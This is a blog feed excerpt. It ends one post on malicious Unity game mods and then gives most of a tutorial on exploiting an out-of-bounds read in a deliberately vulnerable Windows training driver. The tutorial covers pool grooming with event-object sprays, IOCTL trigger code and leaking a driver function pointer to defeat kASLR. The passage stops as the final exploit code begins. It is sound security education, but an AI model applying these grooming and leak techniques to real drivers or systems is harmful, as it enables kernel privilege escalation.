In general, game developers need to decide how much protection they want to add at the app layer versus leaving the risk decision to the end user’s own judgment about which mods to run, just as it’s on them which executables they download. That’s fair, but it might be a good idea to at least give gamers a heads up, via documentation and notifications in the UI layer, that this could be dangerous. They may not expect that mods could do any harm to their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

Exploit Development: Swimming In The (Kernel) Pool - Leveraging Pool Vulnerabilities From Low-Integrity Exploits, Part 1

Introduction

I am writing this blog as I am finishing up an amazing training from HackSys Team. This training finally demystified the pool on Windows for me - something that I have always shied away from. During the training I picked up a lot of pointers (pun fully intended) on everything from an introduction to the kernel low fragmentation heap (kLFH) to pool grooming. As I use blogging as a mechanism not only to share what I know, but to reinforce concepts by writing about them, I wanted to leverage the HackSys Extreme Vulnerable Driver (HEVD), specifically the win10-klfh branch, to chain together two vulnerabilities in the driver from a low-integrity process - an out-of-bounds read and a pool overflow - to achieve an arbitrary read/write primitive. This blog, part 1 of this series, will outline the out-of-bounds read and kASLR bypass from low integrity.

Low-integrity processes and AppContainer-protected processes, such as a browser sandbox, are prevented from using Windows API calls such as EnumDeviceDrivers and NtQuerySystemInformation, which are commonly leveraged to retrieve the base address of ntoskrnl.exe and/or other drivers for kernel exploitation. This stipulation requires a generic kASLR bypass, as was common in the RS2 build of Windows via GDI objects, or some type of vulnerability. With generic kASLR bypasses now few and far between, information leaks, such as an out-of-bounds read, are the de facto standard for bypassing kASLR from something like a browser sandbox.

This blog will touch on the basic internals of the pool on Windows (which is already documented elsewhere much better than any attempt I can make), the implications of the kLFH from an exploit development perspective, and leveraging out-of-bounds read vulnerabilities.

Windows Pool Internals - tl;dr Version

This section will cover a bit about some pre-segment heap internals as well as how the segment heap works after 19H1. First, Windows exposes the API ExAllocatePoolWithTag, the main API used for pool allocations, from which kernel-mode drivers can allocate dynamic memory, much like malloc in user mode. However, drivers targeting Windows 10 2004 or later, according to Microsoft, must use ExAllocatePool2 instead of ExAllocatePoolWithTag, which has been deprecated. For the purposes of this blog we will just refer to the “main allocation function” as ExAllocatePoolWithTag. One note about the “new” APIs is that they initialize allocated pool chunks to zero.

Continuing on, ExAllocatePoolWithTag’s prototype can be seen below.
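
For reference, the documented prototype is:

PVOID ExAllocatePoolWithTag(
    POOL_TYPE PoolType,       // type of pool to allocate from (paged, non-paged, etc.)
    SIZE_T    NumberOfBytes,  // requested allocation size
    ULONG     Tag             // four-character tag used to track the allocation
);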

The first parameter of this function is POOL_TYPE, which is of type enumeration, that specifies the type of memory to allocate. These values can be seen below.

Although there are many different types of allocations, notice how all of them, for the most part, are prefaced with NonPagedPool or PagedPool. This is because, on Windows, pool allocations come from these two pools (or they come from the session pool, which is beyond the scope of this post and is leveraged by win32k.sys). In user mode, developers have the default process heap to allocate chunks from or they can create their own private heaps as well. The Windows pool works a little differently, as the system predefines two pools (for our purposes) of memory for servicing requests in the kernel. Recall also that allocations in the paged pool can be paged out of memory. Allocations in the non-paged pool will always remain paged in. This basically means memory in the NonPagedPool/NonPagedPoolNx is always accessible. This caveat also means that the non-paged pool is a more “expensive” resource and should be used accordingly.

As far as pool chunks go, the terminology is pretty much on point with a heap chunk, which I talked about in a previous blog on browser exploitation. Each pool chunk is prepended with a 0x10-byte _POOL_HEADER structure on 64-bit systems, which can be examined using WinDbg.
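
On a 64-bit system the layout looks roughly like the following (reconstructed from WinDbg's dt nt!_POOL_HEADER output; exact bitfield details can vary between builds):

typedef struct _POOL_HEADER
{
    union
    {
        struct
        {
            USHORT PreviousSize : 8;
            USHORT PoolIndex    : 8;
            USHORT BlockSize    : 8;   // chunk size in 16-byte units
            USHORT PoolType     : 8;
        };
        ULONG Ulong1;
    };
    ULONG PoolTag;                     // e.g. 'kcaH' for the HEVD chunks later in this post
    union                              // offset 0x8 - the union discussed below
    {
        struct _EPROCESS *ProcessBilled;      // only meaningful when PoolQuota is used
        struct
        {
            USHORT AllocatorBackTraceIndex;
            USHORT PoolTagHash;
        };
    };
} POOL_HEADER, *PPOOL_HEADER;          // 0x10 bytes in total on x64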

This structure contains metadata about the in-scope chunk. One interesting thing to note is that when a pool chunk is freed and its _POOL_HEADER isn’t valid, a system crash will occur.

The ProcessBilled member of this structure is a pointer to the _EPROCESS object which made the allocation, but only if PoolQuota was set in the PoolType parameter of ExAllocatePoolWithTag. Notice that at an offset of 0x8 in this structure there is a union, as it is clear that two members reside at offset 0x8.

As a test, let’s set a breakpoint on nt!ExAllocatePoolWithTag. Since the Windows kernel will constantly call this function, we don’t need to create a driver that calls this function, as the system will already do this.

After setting a breakpoint, we can execute the function and examine the return value, which is the pool chunk that is allocated.

Notice how the ProcessBilled member isn’t a valid pointer to an _EPROCESS object. This is because this is a vanilla call to nt!ExAllocatePoolWithTag, without any scheduling quota madness going on, meaning the ProcessBilled member isn’t set. Since the AllocatorBackTraceIndex and PoolTagHash are obviously stored in a union, based on the fact that both the ProcessBilled and AllocatorBackTraceIndex members are at the same offset in memory, the two members AllocatorBackTraceIndex and PoolTagHash are actually “carried over” into the ProcessBilled member. This won’t affect anything, since the ProcessBilled member isn’t accounted for due to the fact that PoolQuota wasn’t set in the PoolType parameter, and this is how WinDbg interprets the memory layout. If the PoolQuota was set, the EPROCESS pointer is actually XOR’d with a random “cookie”, meaning that if you wanted to reconstruct this header you would need to first leak the cookie. This information will be useful later on in the pool overflow vulnerability in part 2, which will not leverage PoolQuota.

Let’s now talk about the segment heap. The segment heap, which was already in use in user mode, was implemented in the Windows kernel with the 19H1 build of Windows 10. The “gist” of the segment heap is this: when a component in the kernel requests some dynamic memory, via one of the previously mentioned API calls, there are now four options that can service the request. They are:

  1. Low Fragmentation Heap (kLFH)
  2. Variable Size (VS)
  3. Segment Alloc
  4. Large Alloc

Each pool is now managed by a _SEGMENT_HEAP structure, as seen below, which provides references to various “segments” in use for the pool and contains metadata for the pool.

The vulnerabilities mentioned in this blog post revolve around the kLFH, so for the purposes of this post I highly recommend reading this paper to find out more about the internals of each allocator and viewing Yarden Shafir’s upcoming BlackHat talk on pool internals in the age of the segment heap!

For the purposes of this exploit and as a general note, let’s talk about how the _POOL_HEADER structure is used.

We talked about the _POOL_HEADER structure earlier - but let’s dig a bit deeper into that concept to see if/when it is even used when the segment heap is enabled.

Any size allocation that cannot fit into a Variable Size segment allocation will pretty much end up in the kLFH. What is interesting here is that the _POOL_HEADER structure is no longer used for chunks within the VS segment. Chunks allocated using the VS segment are actually prefaced with a header structure called _HEAP_VS_CHUNK_HEADER, which was pointed out to me by my co-worker Yarden Shafir. This structure can be seen in WinDbg.

The interesting fact about the pool headers with the segment heap is that the kLFH, which will be the target for this post, still uses _POOL_HEADER structures to preface pool chunks.

Chunks allocated by the kLFH and VS segments are shown below.

Why does this matter? For the purposes of exploitation in part 2, there will be a pool overflow at some point during exploitation. Since we know that pool chunks are prefaced with a header, and because we know that an invalid header will cause a crash, we need to be mindful of this. Using our overflow, we will need to make sure that a valid header is present during exploitation. Since our exploit will be targeting the kLFH, which still uses the standard _POOL_HEADER structure with no encoding, this will prove to be rather trivial later. _HEAP_VS_CHUNK_HEADER, however, performs additional encoding on its members.

The “last piece of this puzzle” is to understand how we can force the system to allocate pool chunks via the kLFH segment. The kLFH services requests that range in size from 1 byte to 16,368 bytes. The kLFH segment is also managed by the _HEAP_LFH_CONTEXT structure, which can be dumped in WinDbg.

The kLFH has “buckets” for each allocation size. The tl;dr here is if you want to trigger the kLFH you need to make 16 consecutive requests to the same size bucket. There are 129 buckets, and each bucket has a “granularity”. Let’s look at a chart to see the determining factors in where an allocation resides in the kLFH, based on size, which was taken from the previously mentioned paper from Corentin and Paul.

This means that allocations served at a 16-byte granularity (1-16 bytes, 17-32 bytes, and so on) are placed into buckets 1-64, starting with bucket 1 for allocations of 1-16 bytes, bucket 2 for 17-32 bytes, and so on, with larger buckets using progressively coarser granularities up to 512 bytes. Anything larger is serviced either by the VS segment or by other components of the segment heap.

Let’s say we perform a pool spray of objects which are 0x40 bytes and we do this 100 times. We can expect that most of these allocations will get stored in the kLFH, due to the heuristics of 16 consecutive allocations and because the size matches one of the buckets provided by the kLFH. This is very useful for exploitation, as it means there is a good chance we can groom the pool relatively well. Grooming refers to getting a lot of pool chunks, which we control, lined up adjacent to each other in order to make exploitation reliable. For example, if we can groom the pool with objects we control, one after the other, we can ensure that a pool overflow will overflow data which we control, leading to exploitation. We will touch a lot more on this in the future.

The kLFH also uses these predetermined buckets to manage chunks. This also removes something known as coalescing, which is when the pool manager combines multiple free chunks into a bigger chunk for performance. Now, with the kLFH, because of the architecture, we know that if we free an object in the kLFH, we can expect that the freed slot will remain free until it is used again by an allocation of that specific chunk size! For example, if we are working with a bucket that serves allocations of up to 1008 bytes, and we allocate two objects of size 1008 bytes and then free these objects, the pool manager will not combine these slots because that would result in a free chunk of 2016 bytes, which doesn’t fit into the bucket, which can only hold chunks of up to 1008 bytes. This means the kLFH will keep these slots free until the next allocation of this size comes in and uses them. This will also be useful later on.

However, what are the drawbacks to the kLFH? Since the kLFH uses predetermined sizes we need to be very lucky to have a driver allocate objects which are the same size as a vulnerable object that can be overflowed or manipulated. Let’s say we can perform a pool overflow into an adjacent chunk as such, in this expertly crafted Microsoft Paint diagram.

If this overflow is happening in a kLFH bucket on the NonPagedPoolNx, for instance, we know that an overflow from one chunk will overflow into another chunk of the EXACT same size. This is because of the kLFH buckets, which predetermine which sizes are allowed in a bucket, which then determines what sizes adjacent pool chunks are. So, in this situation (and as we will showcase in this blog) the chunk that is adjacent to the vulnerable chunk must be of the same size as the chunk and must be allocated on the same pool type, which in this case is the NonPagedPoolNx. This severely limits the scope of objects we can use for grooming, as we need to find objects, whether they are typedef objects from a driver itself or a native Windows object that can be allocated from user mode, that are the same size as the object we are overflowing. Not only that, but the object must also contain some sort of interesting member, like a function pointer, to make the overflow worthwhile. This means now we need to find objects that are capped at a certain size, allocated in the same pool, and contain something interesting.

The last thing to say before we get into the out-of-bounds read is that some of the elements of this exploit are slightly contrived to outline successful exploitation. I will say, however, I have seen drivers which allocate pool memory, let unauthenticated clients specify the size of the allocation, and then return the contents to user mode - so this isn’t to say that there are not poorly written drivers out there. I do just want to call out, however, this post is more about the underlying concepts of pool exploitation in the age of the segment heap versus some “new” or “novel” way to bypass some of the stipulations of the segment heap. Now, let’s get into exploitation.

From Out-Of-Bounds-Read to kASLR bypass - Low-Integrity Exploitation

Let’s take a look at the file in HEVD called MemoryDisclosureNonPagedPoolNx.c. We will start with the code and eventually move our way into dynamic analysis with WinDbg.

The above snippet of code is a function which is defined as TriggerMemoryDisclosureNonPagedPoolNx. This function has a return type of NTSTATUS. This code invokes ExAllocatePoolWithTag and creates a pool chunk on the NonPagedPoolNx kernel pool of size POOL_BUFFER_SIZE and with the pool tag POOL_TAG. Tracing the value of POOL_BUFFER_SIZE in MemoryDisclosureNonPagedPoolNx.h, which is included in the MemoryDisclosureNonPagedPoolNx.c file, we can see that the pool chunk allocated here is 0x70 bytes in size. POOL_TAG is also included in Common.h as kcaH, which is more humanly readable as Hack.

After the pool chunk is allocated in the NonPagedPoolNx it is filled with 0x41 characters, 0x70 of them to be precise, as seen in the call to RtlFillMemory. There is no vulnerability here yet, as nothing so far is influenced by a client invoking an IOCTL which would reach this routine. Let’s continue down the code to see what happens.

After initializing the buffer to a value of 0x70 0x41 characters, the first defined parameter in TriggerMemoryDisclosureNonPagedPoolNx, which is PVOID UserOutputBuffer, is part of a ProbeForWrite routine to ensure this buffer resides in user mode. Where does UserOutputBuffer come from (besides it’s obvious name)? Let’s view where the function TriggerMemoryDisclosureNonPagedPoolNx is actually invoked from, which is at the end of MemoryDisclosureNonPagedPoolNx.c.

We can see that the first argument passed to TriggerMemoryDisclosureNonPagedPoolNx, which is the function we have been analyzing thus far, is passed an argument called UserOutputBuffer. This variable comes from the I/O Request Packet (IRP) which was passed to the driver and created by a client invoking DeviceIoControl to interact with the driver. More specifically, this comes from the IO_STACK_LOCATION structure, which always accompanies an IRP. This structure contains many members and data used by the IRP to pass information to the driver. In this case, the associated IO_STACK_LOCATION structure contains most of the parameters used by the client in the call to DeviceIoControl. The IRP structure itself contains the UserBuffer parameter, which is actually the output buffer supplied by a client using DeviceIoControl. This means that this buffer will be bubbled back up to user mode, or any client for that matter, which sends an IOCTL code that reaches this routine. I know this seems like a mouthful right now, but I will give the “tl;dr” here in a second.
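
As a rough sketch, a METHOD_NEITHER IOCTL dispatch routine typically pulls these values out of the IRP along these lines (illustrative names only, not the verbatim HEVD dispatch code):

// Illustrative sketch - not the exact HEVD dispatch routine
PIO_STACK_LOCATION IrpSp = IoGetCurrentIrpStackLocation(Irp);

// lpOutBuffer passed by the client to DeviceIoControl
PVOID UserOutputBuffer = Irp->UserBuffer;

// nOutBufferSize passed by the client to DeviceIoControl
ULONG OutputBufferSize = IrpSp->Parameters.DeviceIoControl.OutputBufferLength;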

Essentially what happens here is a user-mode client can specify a size and a buffer, which will get used in the call to TriggerMemoryDisclosureNonPagedPoolNx. Let’s then take a quick look back at the image from two images ago, which has again been displayed below for brevity.

Skipping over the #ifdef SECURE directive, which is obviously what a “secure” driver should use, we can see that if the allocation of the pool chunk we previously mentioned, which is of size POOL_BUFFER_SIZE, or 0x70 bytes, is successful - the contents of the pool chunk are written to the UserOutputBuffer variable, which will be returned to the client invoking DeviceIoControl, and the amount of data copied to this buffer is actually decided by the client via the nOutBufferSize parameter.

What is the issue here? ExAllocatePoolWithTag allocates a pool chunk of a fixed POOL_BUFFER_SIZE bytes. The issue is that the developer of this driver is not just copying the chunk’s contents to the UserOutputBuffer parameter; the call to RtlCopyMemory also allows the client to decide the number of bytes written to the UserOutputBuffer parameter. This isn’t an issue of a buffer overflow on the UserOutputBuffer side, as we fully control this buffer via our call to DeviceIoControl and can make it large enough to avoid it being overflowed. The issue is the second and third parameters.

The pool chunk allocated in this case is 0x70 bytes. If we look at the #ifdef SECURE directive, we can see that the KernelBuffer created by the call to ExAllocatePoolWithTag is copied to the UserOutputBuffer parameter and NOTHING MORE, as defined by the POOL_BUFFER_SIZE parameter. Since the allocation created is only POOL_BUFFER_SIZE, we should only allow the copy operation to copy this many bytes.
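
To make the difference concrete, a simplified sketch of the two copy paths described above (following the prose, not the verbatim HEVD source; Size stands for the client-controlled length derived from nOutBufferSize) looks like this:

#ifdef SECURE
    // Bounded copy: only the 0x70 bytes that were actually allocated are returned
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, POOL_BUFFER_SIZE);
#else
    // Vulnerable copy: Size is fully attacker-controlled, so any bytes beyond
    // POOL_BUFFER_SIZE are read from the adjacent pool chunk and returned
    RtlCopyMemory(UserOutputBuffer, KernelBuffer, Size);
#endif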

If a size greater than 0x70, or POOL_BUFFER_SIZE, is provided to the RtlCopyMemory function, then the adjacent pool chunk right after the KernelBuffer pool chunk would also be copied to the UserOutputBuffer. The diagram below outlines this behavior.

If the size of the copy operation is greater than the allocation size of 0x70 bytes, the bytes after 0x70 are taken from the adjacent chunk and are also bubbled back up to user mode. In the case of supplying a value of 0x100 in the size parameter, which is controllable by the caller, the 0x70 bytes from the allocation would be copied back into user mode and the next 0x30 bytes from the adjacent chunk would also be copied back into user mode. Let’s verify this in WinDbg.

For brevity’s sake, the routine to reach this code is via the IOCTL 0x0022204f. Here is the code we are going to send to the driver.
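
A minimal sketch of that trigger, assuming driverHandle has already been obtained with CreateFileA against \\.\HackSysExtremeVulnerableDriver (as in the full exploit at the end of this post):

BYTE outputBuffer[0x70] = { 0 };   // matches POOL_BUFFER_SIZE for now
DWORD bytesReturned = 0;

DeviceIoControl(
    driverHandle,              // handle to the HEVD device
    0x0022204f,                // IOCTL that reaches TriggerMemoryDisclosureNonPagedPoolNx
    NULL,                      // no input buffer needed
    0,
    outputBuffer,              // UserOutputBuffer in the driver
    sizeof(outputBuffer),      // nOutBufferSize - the size the driver will copy back
    &bytesReturned,
    NULL
);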

We can start by setting a breakpoint on HEVD!TriggerMemoryDisclosureNonPagedPoolNx

Per the __fastcall calling convention, the two arguments passed to TriggerMemoryDisclosureNonPagedPoolNx will be in RCX (the UserOutputBuffer parameter) and RDX (the size specified by us). Dumping the RCX register, we can see the 0x70 bytes that will hold the copied pool contents.

We can then set a breakpoint on the call to nt!ExAllocatePoolWithTag.

After executing the call, we can then inspect the return value in RAX.

Interesting! We know the IOCTL code in this case allocated a pool chunk of 0x70 bytes, but every allocation in the pool page our chunk (denoted with the asterisk above) resides in is actually 0x80 bytes. Remember - each chunk in the kLFH is prefaced with a _POOL_HEADER structure. We can validate this below by checking that the offset to the PoolTag member of _POOL_HEADER resolves correctly.

The total size of this pool chunk with the header is 0x80 bytes. Recall earlier when we spoke about the kLFH that this size allocation would fall within the kLFH! We know the next thing the code will do in this situation is to copy 0x41 values into the newly allocated chunk. Let’s set a breakpoint on HEVD!memset, which is actually just what the RtlFillMemory macro defaults to.

Inspecting the return value, we can see the buffer was initialized to 0x41 values.

The next action, as we can recall, is the copying of the data from the newly allocated chunk to user mode. Setting a breakpoint on the HEVD!memcpy call, which is the actual function the macro RtlCopyMemory will call, we can inspect RCX, RDX, and R8, which will be the destination, source, and size respectively.

Notice the value in RCX, which is a user-mode address (and the address of our output buffer supplied by DeviceIoControl), is different than the original value shown. This is simply because I had to re-run the POC trigger between the original screenshot and the current. Other than that, nothing else has changed.

After stepping through the memcpy call we can clearly see the contents of the pool chunk are returned to user mode.

Perfect! This is expected behavior by the driver. However, let’s try increasing the size of the output buffer and see what happens, per our hypothesis on this vulnerability. This time, let’s set the output buffer to 0x100.

This time, let’s just inspect the memcpy call.

Take note of the above highlighted content after the 0x41 values.

Let’s now check out the pool chunks in this pool and view the adjacent chunk to our Hack pool chunk.

Last time we performed the IOCTL invocation, only values of 0x41 were bubbled back up to user mode. However, recall that this time we specified a value of 0x100. This means this time we should also be returning the next 0x30 bytes after the Hack pool chunk back to user mode. Taking a look at the previous image, we can see that the chunk directly after the Hack chunk is at 0xffffe48f4254fb00 and contains the value 6c54655302081b00 and so on, which is the _POOL_HEADER for the next chunk, as seen below.

These 0x10 bytes, plus the next 0x20 bytes should be returned to us in user mode, as we specified we want to go beyond the bounds of the pool chunk, hence an “out-of-bounds read”. Executing the POC, we can see this is the case!

Awesome! We can see, minus some of the endianness madness that is occurring, we have successfully read memory from the adjacent chunk! This is very useful, but remember what our goal is - we want to bypass kASLR. This means we need to leak some sort of pointer either from the driver or ntoskrnl.exe itself. How can we achieve this if all we can leak is the next adjacent pool chunk? To do this, we need to perform some additional steps to ensure that, while we are in the kLFH segment, the adjacent chunk(s) always contain some sort of useful pointer that can be leaked by us. This process is called “pool grooming”.

Taking The Dog To The Groomer

Up until this point we know we can read data from adjacent pool chunks, but as of now there isn’t really anything interesting next to these chunks. So, how do we combat this? Let’s talk about a few assumptions here:

  1. We know that if we can choose an object to read from, this object will need to be 0x70 bytes in size (0x80 when you include the _POOL_HEADER)
  2. This object needs to be allocated on the NonPagedPoolNx directly after the chunk allocated by HEVD in MemoryDisclosureNonPagedPoolNx
  3. This object needs to contain some sort of useful pointer

How can we go about doing this? Let’s sort of visualize what the kLFH does in order to service requests of 0x70 bytes (technically 0x80 with the header). Please note that the following diagram is for visual purposes only.

As we can see, there are several free slots within this specific page in the pool. If we allocated an object of size 0x80 (technically 0x70, where the _POOL_HEADER is dynamically created) we have no way to know where it will land, and no way to force the allocation to occur at a predictable location. That said, the kLFH may not even be enabled at all, due to the heuristic requirement of 16 consecutive allocations of the same size. Where does this leave us? Well, what we can do is to first make sure the kLFH is enabled and then also to “fill” all of the “holes”, or currently freed allocations, with a set of objects. This will force the memory manager to allocate a new page entirely to service new allocations. This process of the memory manager allocating a new page for future allocations within the kLFH bucket is ideal, as it gives us a “clean slate” to start on without random free chunks that could be serviced at random intervals. We want to do this before we invoke the IOCTL which triggers the TriggerMemoryDisclosureNonPagedPoolNx function in MemoryDisclosureNonPagedPoolNx.c. This is because we want the allocation for the vulnerable pool chunk, which will be the same size as the objects we use for “spraying” the pool to fill the holes, to end up in the same page as the sprayed objects we have control over. This will allow us to groom the pool and make sure that we can read from a chunk that contains some useful information.

Let’s recall the previous image which shows where the vulnerable pool chunk ends up currently.

Organically, without any grooming/spraying, we can see that there are several other types of objects in this page. Notably, we can see several Even tags. This tag is used for objects created with a call to CreateEvent, a Windows API which can be invoked from user mode. The prototype can be seen below.
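
For CreateEventA (the ANSI variant used later in the exploit), the documented prototype is:

HANDLE CreateEventA(
    LPSECURITY_ATTRIBUTES lpEventAttributes, // NULL -> default security descriptor
    BOOL                  bManualReset,      // FALSE -> auto-reset event
    BOOL                  bInitialState,     // FALSE -> initially non-signaled
    LPCSTR                lpName             // NULL -> unnamed event object
);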

This function returns a handle to the object, which is technically backed by a pool chunk in kernel mode. This is reminiscent of obtaining a handle to the driver via the call to CreateFile. The handle is an intermediary object that we can interact with from user mode and which has a kernel-mode component.

Let’s update the code to leverage CreateEventA to spray an arbitrary number of objects, 5,000 in this case.

After executing the newly updated code and after setting a breakpoint on the copy location, with the vulnerable pool chunk, take a look at the state of the page which contains the pool chunk.

This isn’t in an ideal state yet, but notice how we have influenced the page’s layout. We can see now that there are many free objects and a few event objects. This suggests we got a new page for our vulnerable chunk to land in, as the vulnerable chunk is preceded by several event objects and was allocated directly after them. We can also perform additional analysis by inspecting the previous page (recall that for our purposes on this 64-bit Windows 10 install a page is 0x1000 bytes, or 4KB).

It seems as though all of the previous chunks that were free have been filled with event objects!

Notice, though, that the pool layout is not perfect. This is due to other components of the kernel also leveraging the kLFH bucket for 0x70 byte allocations (0x80 with the _POOL_HEADER).

Now that we know we can influence the behavior of the pool by spraying, the goal is to fill the entire new page with event objects and then free every other object we control in the new page. Right after freeing every other object, we can then create new objects of the same size as the event object(s) we just freed. By doing this, the kLFH, due to optimization, will fill the free slots with the new objects we allocate. This is because the current page is the only page that should have free slots available in the NonPagedPoolNx for allocations being serviced by the kLFH for size 0x70 (0x80 including the header).

We would like the pool layout to look like this (for the time being):

EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT | EVENT_OBJECT | NEWLY_CREATED_OBJECT 

So what kind of object would we like to place in the “holes” we want to poke? This object is the one we want to leak back to user mode, so it should contain either valuable kernel information or a function pointer. The hardest/most tedious part of pool corruption is finding something that is not only the size needed, but also contains valuable information. This especially holds true if you cannot use a generic Windows object and need to use a structure that is specific to a driver.

In any event, this next part is a bit “simplified”. It will take a bit of reverse engineering/debugging of the calls that allocate pool chunks for objects to find a suitable candidate. The way to approach this, at least in my opinion, would be as follows:

  1. Identify calls to ExAllocatePoolWithTag, or similar APIs
  2. Narrow this list down by finding calls to the aforementioned API(s) that are allocated within the pool you are able to corrupt (e.g. if I have a vulnerability on the NonPagedPoolNx, find an allocation on the NonPagedPoolNx)
  3. Narrow this list further by finding calls that meet the above criteria but for the specific pool chunk size you need
  4. If you have made it this far, narrow this down further by finding an object with all of the above attributes and with an interesting member, such as a function pointer

However, since we have the source code available, which makes this slightly easier, let’s find a suitable object within HEVD. In HEVD there is an object which contains a function pointer, called USE_AFTER_FREE_NON_PAGED_POOL_NX. It is constructed as such, within UseAfterFreeNonPagedPoolNx.h
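
Loosely, the structure has the following shape. This is a sketch based on the description in the next paragraphs, not the verbatim HEVD header; the exact Buffer size in the real header is whatever makes the total allocation land in the 0x70-byte bucket, and 0x68 here is an assumption for illustration:

typedef void (*FunctionPointer)(void);          // from Common.h

typedef struct _USE_AFTER_FREE_NON_PAGED_POOL_NX
{
    FunctionPointer Callback;                   // set to UaFObjectCallbackNonPagedPoolNx
    CHAR Buffer[0x68];                          // assumed size so the allocation is 0x70 bytes on x64
} USE_AFTER_FREE_NON_PAGED_POOL_NX, *PUSE_AFTER_FREE_NON_PAGED_POOL_NX;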

This structure is used in a function call within UseAfterFreeNonPagedPoolNx.c and the Buffer member is initialized with 0x41 characters.

The Callback member, which is of type FunctionPointer and is defined in Common.h as typedef void (*FunctionPointer)(void);, is set to the memory address of UaFObjectCallbackNonPagedPoolNx, which is a function located in UseAfterFreeNonPagedPoolNx.c, shown two images ago! This means a member of this structure will contain a function pointer within HEVD, a kernel mode address. We know by the name that this object will be allocated on the NonPagedPoolNx, but you could still validate this by performing static analysis on the call to ExAllocatePoolWithTag to see what value is specified for POOL_TYPE.

This seems like a perfect candidate! The goal will be to leak this structure back to user mode with the out-of-bounds read vulnerability! The only factor that remains is size - we need to make sure this object is also 0x70 bytes in size, so it lands within the same pool page we control.

Let’s test this in WinDbg. In order to reach the AllocateUaFObjectNonPagedPoolNx function we need to interact with the IOCTL handler for this particular routine, which is defined in NonPagedPoolNx.c.

The IOCTL code needed to reach this routine, for brevity, is 0x00222053. Let’s set a breakpoint on HEVD!AllocateUaFObjectNonPagedPoolNx in WinDbg, issue a DeviceIoControl call to this IOCTL without any buffers, and see what size is being used in the call to ExAllocatePoolWithTag to allocate this object.

Perfect! Slightly contrived, but nonetheless true, the object being created here is also 0x70 bytes (without the _POOL_HEADER structure) - meaning this object should be allocated adjacent to any free slots within the page our event objects live in! Let’s update our POC to perform the following:

  1. Free every other event object
  2. Replace every other event object (5000/2 = 2500) with a USE_AFTER_FREE_NON_PAGED_POOL_NX object

Using the memcpy routine (RtlCopyMemory) from the original out-of-bounds read IOCTL invocation into the vulnerable pool chunk, we can inspect the pool chunk used in the copy operation (the chunk bubbled back up to user mode), which shows that our event objects are now adjacent to multiple USE_AFTER_FREE_NON_PAGED_POOL_NX objects.

We can see that the Hack tagged chunks, which are USE_AFTER_FREE_NON_PAGED_POOL_NX chunks, are pretty much adjacent to the event objects! Even if not every object is perfectly adjacent to the previous event object, this is not a worry for us because the vulnerability allows us to specify how much of the data from the adjacent chunks we would like to return to user mode anyways. This means we could specify an arbitrary amount, such as 0x1000, and that is how many bytes would be returned from the adjacent chunks.

Since there are many chunks which are adjacent, this will result in an information leak. The reason the layout is not perfect is that the kLFH has a bit of “funkiness” going on. This isn’t necessarily due to any sort of kLFH “randomization” of where the free chunks will be or where the allocations will occur, as I found out after talking with my colleague Yarden Shafir, but due to the complexity of the subsegment locations, caching, etc. Things can get complex quite quickly, and this is beyond the scope of this blog post.

The only time this becomes an issue, however, is when clients can read out-of-bounds but cannot specify how many bytes out-of-bounds they can read. This would result in exploits needing to run a few times in order to leak a valid kernel address, until the chunks become adjacent. However, someone who is better at pool grooming than myself could easily figure this out I am sure :).

Now that we can groom the pool decently enough, the next step is to replace the rest of the event objects with vulnerable objects from the out-of-bounds read vulnerability! The desired layout of the pool will be this:

VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX | VULNERABLE_OBJECT | USE_AFTER_FREE_NON_PAGED_POOL_NX 

Why do we want this to be the desired layout? Each of the VULNERABLE_OBJECTS can read additional data from adjacent chunks. Since (theoretically) the next adjacent chunk should be USE_AFTER_FREE_NON_PAGED_POOL_NX, we should be returning this entire chunk to user mode. Since this structure contains a function pointer in HEVD, we can then bypass kASLR by leaking a pointer from HEVD! To do this, we will need to perform the following steps:

  1. Free the rest of the event objects
  2. Perform a number of calls to the IOCTL handler for allocating vulnerable chunks

For step two, we don’t want to perform 2500 DeviceIoControl calls, as there is potential for one of the last memory addresses in the page to be set to one of our vulnerable objects. If we specify we want to read 0x1000 bytes, and if our vulnerable object is at the end of the last valid page for the pool, it will try reading memory 0x1000 bytes away, which may reside in a page that is not currently committed to memory, causing a DoS by referencing invalid memory. To compensate for this, we only want to allocate 100 vulnerable objects, as one of them will almost surely be allocated in a block adjacent to a USE_AFTER_FREE_NON_PAGED_POOL_NX object.

To do this, let’s update the code as follows.

After freeing the event objects and reading back data from adjacent chunks, a for loop is used to parse the output for anything that is sign-extended (a kernel-mode address). Since the output buffer is returned as an unsigned long long array, the size of a 64-bit address, and since the address we want to leak is the first member of the adjacent chunk after the leaked _POOL_HEADER, it should land in a clean 64-bit array element and therefore be easily parsed. Once we have leaked the address of the function pointer, we can calculate the distance from that function to the base of HEVD, subtract the distance, and obtain the base of HEVD!

Executing the final exploit, leveraging the same breakpoint on the final HEVD!memcpy call (remember, we are executing 100 calls to the final DeviceIoControl routine, which invokes the RtlCopyMemory routine, meaning we need to step through 99 times to hit the final copy back into user mode), we can see the layout of the pool.

The above image is a bit difficult to decipher, given that both the vulnerable chunks and the USE_AFTER_FREE_NON_PAGED_POOL_NX chunks have Hack tags. However, if we take the chunk adjacent to the current chunk (a vulnerable chunk we can read past, denoted by an asterisk) and parse it as a USE_AFTER_FREE_NON_PAGED_POOL_NX object, we can clearly see that this object is of the correct type and contains a function pointer within HEVD!

We can then subtract the distance from this function pointer to the base of HEVD, and update our code accordingly. We can see the distance is 0x880cc, so adding this to the code is trivial.

After performing the calculation, we can see we have bypassed kASLR, from low integrity, without any calls to EnumDeviceDrivers or similar APIs!

The final code can be seen below.

// HackSysExtreme Vulnerable Driver: Pool Overflow/Memory Disclosure
// Author: Connor McGarr(@33y0re)

// Vulnerability description: Arbitrary read primitive
// User-mode clients have the ability to control the size of an allocated pool chunk on the NonPagedPoolNx
// This pool chunk is 0x80 bytes (including the header)
// There is an object, a UafObject created by HEVD, that is 0x80 bytes in size (including the header) and contains a function pointer that is to be read -- this must be used due to the kLFH, which is only groomable for sizes in the same bucket
// CreateEventA can be used to allocate 0x80 byte objects, including the size of the header, which can also be used for grooming

#include <windows.h>
#include <stdio.h>

// Fill the holes in the NonPagedPoolNx of 0x80 bytes
void memLeak(HANDLE driverHandle)
{
